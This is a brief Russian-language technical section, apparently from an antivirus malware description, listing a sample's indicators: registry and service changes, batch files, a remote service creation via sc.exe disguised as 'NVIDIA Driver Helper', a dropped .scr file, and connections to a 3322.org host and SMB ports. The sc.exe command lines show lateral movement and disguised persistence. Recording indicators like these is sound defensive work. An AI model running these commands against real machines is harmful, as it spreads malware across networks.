Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\VM7] 'Start' = '00000002'
- C:\Documents and Settings\carss.exe yy.tmp WWW
- <SYSTEM32>\cmd.exe /c ""C:\Documents and Settings\yy.bat" "
- <SYSTEM32>\sc.exe \\192.168.190.132 config "VM7" binpath= "cmd.exe /c "C:\Documents and Settings\yy.bat"" start= auto type= interact type= own obj= localsystem password= ""
- <SYSTEM32>\cmd.exe /c "C:\Documents and Settings\fw.bat"
- <SYSTEM32>\sc.exe \\192.168.190.132 create "VM7" binpath= "cmd.exe /c "C:\Documents and Settings\yy.bat"" start= auto type= interact type= own displayname= "NVIDIA Driver Helper"
- C:\Documents and Settings\fw.bat
- C:\Documents and Settings\yy.bat
- \Device\LanmanRedirector\192.168.190.132\pipe\svcctl
- C:\Documents and Settings\yy.tmp
- C:\Documents and Settings\carss.exe
- %ALLUSERSPROFILE%\tmp~1.ini
- из <Полный путь к вирусу> в C:\ИИґшУг.scr
- 'mm##.3322.org':2013
- '<IP-адрес в локальной сети>':139
- '<IP-адрес в локальной сети>':445
- DNS ASK mm##.3322.org